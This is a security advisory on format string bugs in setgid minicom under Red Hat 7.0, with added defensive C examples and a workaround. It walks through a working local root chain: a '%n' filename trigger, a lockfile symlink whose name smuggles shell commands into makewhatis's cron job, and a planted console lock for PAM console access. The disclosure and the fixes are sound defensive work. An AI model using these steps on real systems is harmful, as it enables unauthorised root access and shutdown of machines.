COMMAND

    minicom

SYSTEMS AFFECTED

    RedHat 7.0

PROBLEM

    Zenith Parsec found the following.  Minicom has multiple format
    string bugs in:

        - ulog()
        - werror()

    Any user who has access to a correctly configured, setgid uucp
    minicom can potentially gain root access within 24 hours, or obtain
    console access (as determined by PAM) and be able to shut the
    machine down immediately.

    This affects Red Hat 7.0 and, judging by the dates in source code
    comments, almost certainly earlier releases as well.  It may not be
    a security hole on other distributions; that depends on whether
    minicom is installed setuid/setgid.  A root exploit does exist.

    If minicom -s has not been run as root beforehand, this exploit will
    probably not work.

        [root@clarity src]# whatis minicom
        minicom              (1)  - friendly serial communication program
        [root@clarity /root]# rpm -qf `which minicom`
        minicom-1.83.1-4
        [root@clarity src]# ll `which minicom`
        -rwxr-sr-x    1 root     uucp       171452 Jan 30 05:54 /usr/bin/minicom*
        [root@clarity src]# cd /usr/src/redhat/SOURCES/minicom-1.83.1/src
        [root@clarity src]# grep do_log common.c|grep -v "%"
        common.c: *             void do_log(char *)     - write a line to the logfile
        common.c: * 27.10.98 jl  converted do_log to use stdarg
        common.c:void do_log(char *line, ...)
        common.c:void do_log(char *line, ...)
        [root@clarity src]# grep do_log updown.c
            do_log(cmdline);   /* jl 22.06.97 */
                                do_log (trimbuf);
                              do_log(trimbuf);
            do_log (trimbuf);

    should be:

            do_log("%s",cmdline);   /* jl 22.06.97 */
                                do_log ("%s",trimbuf);
                              do_log("%s",trimbuf);
            do_log ("%s",trimbuf);

    Other do_log() calls with the same pattern are spread through code
    that ZP has not checked; they should probably be fixed as well.

    updown.c contains the code for uploading and downloading files.
    cmdline holds the command that it executes to do so, and part of
    that command is, of course, the filename.
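    The defect and its fix, reduced to a self-contained C example that
    is added here and is not minicom's code: a stand-in do_log() that
    writes to a buffer instead of the logfile, a wrapper that passes the
    command line as a "%s" argument rather than as the format, and an
    audit helper, contains_format_directive() (an assumed name), that
    flags strings carrying conversion directives before they reach a
    printf-family function.  The command line is constructed to match
    the string gdb shows below.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for minicom's do_log(): a printf-style variadic logger.  It writes
 * to a buffer instead of the logfile so the result can be inspected offline. */
static char logbuf[256];

void do_log(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(logbuf, sizeof logbuf, fmt, ap);
    va_end(ap);
}

/* Corrected call pattern: the user-influenced command line is data for a
 * fixed "%s" format, never the format itself.  Returns the logged text. */
const char *log_command_safe(const char *cmdline)
{
    do_log("%s", cmdline);
    return logbuf;
}

/* Build the transfer command the way updown.c does conceptually: the user's
 * filename is pasted into the command line (constructed example). */
void build_cmdline(char *out, size_t outlen, const char *prog, const char *filename)
{
    snprintf(out, outlen, "%s %s", prog, filename);
}

/* Audit helper (assumed name, not from minicom): returns 1 if a string that
 * would reach a printf-family format argument contains a conversion
 * directive ("%%" is a literal percent and does not count), else 0. */
int contains_format_directive(const char *s)
{
    const char *p = s;
    while ((p = strchr(p, '%')) != NULL) {
        if (p[1] == '%') { p += 2; continue; }  /* escaped percent */
        return 1;                                /* %n, %s, %x, ... */
    }
    return 0;
}

int main(void)
{
    char cmd[128];
    /* Same string the gdb session on this page shows as the format. */
    build_cmdline(cmd, sizeof cmd, "/usr/bin/sx -vv", "%n");
    printf("cmdline:           %s\n", cmd);
    printf("has directive:     %d\n", contains_format_directive(cmd));
    printf("logged safely as:  %s\n", log_command_safe(cmd));
    return 0;
}
```

    The point of the helper is not to sanitise filenames (a "%" in a
    filename is legitimate) but to make the bad pattern easy to spot in
    review: any string that can reach a format argument and that
    contains a directive is a bug at the call site, and the fix is always
    the fixed "%s" format, never filtering the data.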

        [root@clarity src]# touch ~/%n
        [root@clarity src]# ll ~/%n
        -rw-r--r--    1 root     root            0 Apr 11 11:26 /root/%n

    Root is used to demonstrate the problem so that the sgid program can
    be run under gdb.

        [root@clarity src]# gdb minicom
        GNU gdb 5.0
        Copyright 2000 Free Software Foundation, Inc.
        GDB is free software, covered by the GNU General Public License, and you are
        welcome to change it and/or distribute copies of it under certain conditions.
        Type "show copying" to see the conditions.
        There is absolutely no warranty for GDB.  Type "show warranty" for details.
        This GDB was configured as "i386-redhat-linux"...
        (no debugging symbols found)...
        (gdb) r
        Starting program: /usr/bin/minicom
        minicom: WARNING: please don't run minicom as root when not maintaining
                          it (with the -s switch) since all changes to the
                          configuration will be GLOBAL !.

    Screen clears... initializing modem message...

        Welcome to minicom 1.83.1

        OPTIONS: History Buffer, F-key Macros, Search History Buffer, I18n
        Compiled on Aug 24 2000, 10:09:47.

        Press CTRL-A Z for help on special keys

    Press ^A S, select xmodem, then move the cursor down to %n, press
    space to tag it and then press return...

        (no debugging symbols found)...
        Program received signal SIGSEGV, Segmentation fault.
        0x400b7a17 in _IO_vfprintf (s=0x8080a60,
            format=0xbffff2c0 "/usr/bin/sx -vv %n", ap=0xbffff248)
            at ../sysdeps/i386/i486/bits/string.h:539
        539     ../sysdeps/i386/i486/bits/string.h: No such file or directory.
        (gdb) q

    OK, big deal.  You get gid uucp if you exploit it.

        [root@clarity src]# cd /var/lock
        [root@clarity lock]# ls -Flatrck
        total 20
        drwxr-xr-x   19 root     root         4096 Apr  5 02:35 ../
        drwxrwxr-x    2 root     root         4096 Apr  7 12:10 subsys/
        drwxr-xr-x    2 root     root         4096 Apr  9 13:16 console/
        drwxrwxr-x    4 root     uucp         4096 Apr 11 11:31 ./

    Writable by gid uucp.  OK.

        [root@clarity lock]# cat /etc/cron.daily/makewhatis.cron
        #!/bin/bash

        LOCKFILE=/var/lock/makewhatis.lock

        # the lockfile is not meant to be perfect, it's just in case the
        # two makewhatis cron scripts get run close to each other to keep
        # them from stepping on each other's toes.  The worst that will
        # happen is that they will temporarily corrupt the database...
        [ -f $LOCKFILE ] && exit 0
        trap "rm -f $LOCKFILE" EXIT
        touch $LOCKFILE
        makewhatis -u -w
        exit 0

    The worst that can happen is that someone will exploit this lockfile
    mechanism for root.
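    The script's "[ -f $LOCKFILE ] && exit 0" followed by "touch" is a
    check-then-act sequence in a directory that group uucp can write,
    so anything that group plants under the lock name is followed.  The
    following C example is added here (it is not part of the cron
    script or of Red Hat's packaging) and shows the two checks a
    defender wants: a directory-mode test that rejects group- or
    world-writable lock directories, and a lock acquisition that uses a
    single open() with O_CREAT|O_EXCL|O_NOFOLLOW, which atomically
    fails if a file or symlink already holds the name.  The function
    names are assumed.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE        /* exposes O_NOFOLLOW on glibc */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Is a directory safe to keep lock files in?  A directory writable by a
 * group or by others lets those users plant files or symlinks under the
 * lock name.  Takes raw mode bits so it can be checked against constructed
 * values; the sticky bit is deliberately not treated as an exemption. */
int lockdir_mode_is_safe(mode_t mode)
{
    return (mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Create a lock file without following anything already present: O_EXCL
 * fails if the name exists (file or symlink) and O_NOFOLLOW refuses a symlink
 * as the final component.  Returns an open fd, or -1 with errno set (EEXIST
 * means another instance, or a planted entry, holds the name). */
int acquire_lockfile(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
}

int main(void)
{
    struct stat st;
    if (stat("/var/lock", &st) == 0)
        printf("/var/lock mode %04o safe=%d\n",
               (unsigned)(st.st_mode & 07777), lockdir_mode_is_safe(st.st_mode));

    int fd = acquire_lockfile("/tmp/example.lock");   /* demo path, constructed */
    if (fd < 0) {
        perror("acquire_lockfile");
    } else {
        printf("lock acquired\n");
        close(fd);
        unlink("/tmp/example.lock");
    }
    return 0;
}
```

    With the page's /var/lock permissions (drwxrwxr-x root uucp, i.e.
    mode 0775) lockdir_mode_is_safe() returns 0, which is the condition
    the cron script should have refused to run under.  Even with a safe
    directory, acquiring the lock with O_EXCL in one system call removes
    the race between the existence test and the touch.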

        [root@clarity lock]# su uucp

    Alternatively, run an exploit against minicom; the gid is the
    important part.

        sh-2.04$ id
        uid=10(uucp) gid=14(uucp) groups=14(uucp)
        sh-2.04$ ln -s "/usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz" /var/lock/makewhatis.lock
        sh-2.04$ ls -al
        total 16
        drwxrwxr-x    4 root     uucp         4096 Apr 11 11:41 .
        drwxr-xr-x   19 root     root         4096 Apr  5 02:35 ..
        drwxr-xr-x    2 root     root         4096 Apr  9 13:16 console
        lrwxrwxrwx    1 uucp     uucp           91 Apr 11 11:41 makewhatis.lock -> /usr/share/man/man1/ls.1.gz;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;getroot;echo .1.gz
        drwxrwxr-x    2 root     root         4096 Apr  7 12:10 subsys

    OK, so what is happening?  Look at /usr/sbin/makewhatis:

        pipe_cmd = "zcat " filename;

    If the filename contains shell commands, they will be executed.
    This is not normally a problem, since what manpages have embedded
    shell commands?  Malicious ones, like this one.  The echo on the end
    prevents the command from returning an error.  The export PATH=. is
    needed because no / characters can be put in the filename.  That
    will get you root the next time /etc/cron.daily/makewhatis.cron
    runs.  What else?
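    The defensive counterpart to building "zcat " filename and handing
    it to a shell is to run the program directly with the filename as
    its own argv element, so that ';' and the rest of a planted name are
    just bytes in one argument.  The C example below is added here and
    is not from makewhatis (which is an awk script); run_capture() is an
    assumed name, and the demo uses /bin/echo in place of zcat so that
    the argument the child actually received is visible.

```c
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Run prog with a single argument and capture its stdout into out.  No shell
 * is involved: the argument is delivered as one argv element, so shell
 * metacharacters in it are never interpreted.  Returns bytes captured, or -1
 * on error. */
ssize_t run_capture(const char *prog, const char *arg, char *out, size_t outlen)
{
    if (outlen == 0) return -1;
    int pfd[2];
    if (pipe(pfd) < 0) return -1;

    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {                                  /* child */
        close(pfd[0]);
        dup2(pfd[1], STDOUT_FILENO);
        close(pfd[1]);
        char *const argv[] = { (char *)prog, (char *)arg, NULL };
        execv(prog, argv);                            /* direct exec, no /bin/sh */
        _exit(127);
    }

    close(pfd[1]);                                   /* parent */
    size_t n = 0;
    ssize_t r;
    while (n < outlen - 1 && (r = read(pfd[0], out + n, outlen - 1 - n)) > 0)
        n += (size_t)r;
    out[n] = '\0';
    close(pfd[0]);
    int status;
    waitpid(pid, &status, 0);
    return (ssize_t)n;
}

int main(void)
{
    /* Constructed name in the style of the planted symlink above; with a
     * shell in the path it would be parsed as several commands. */
    const char *name = "ls.1.gz;cd ..;export PATH=.;getroot;echo .1.gz";
    char buf[256];
    if (run_capture("/bin/echo", name, buf, sizeof buf) < 0) {
        perror("run_capture");
        return 1;
    }
    printf("child saw one argument: %s", buf);
    return 0;
}
```

    For the real case the call would be run_capture("/bin/zcat", name,
    ...), and the decompressed text would then be parsed in the parent;
    the filename never passes through a command string at all, so
    quoting rules and PATH tricks do not enter into it.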

        sh-2.04$ rm makewhatis.lock
        sh-2.04$ echo -n uucp>console.lock
        sh-2.04$ mv console oldconsole
        sh-2.04$ mkdir console;touch console/uucp

    Now we are at the console (according to PAM, anyway).  Halt, anyone?

SOLUTION

    Workaround: chmod -s /usr/bin/minicom

    For Immunix OS:

        http://download.immunix.org/ImmunixOS/6.2/updates/RPMS/minicom-1.83.1-1.0.6x_StackGuard.i386.rpm
        http://download.immunix.org/ImmunixOS/6.2/updates/SRPMS/minicom-1.83.1-1.0.6x_StackGuard.src.rpm
        http://download.immunix.org/ImmunixOS/7.0/updates/RPMS/minicom-1.83.1-8_imnx.i386.rpm
        http://download.immunix.org/ImmunixOS/7.0/updates/SRPMS/minicom-1.83.1-8_imnx.src.rpm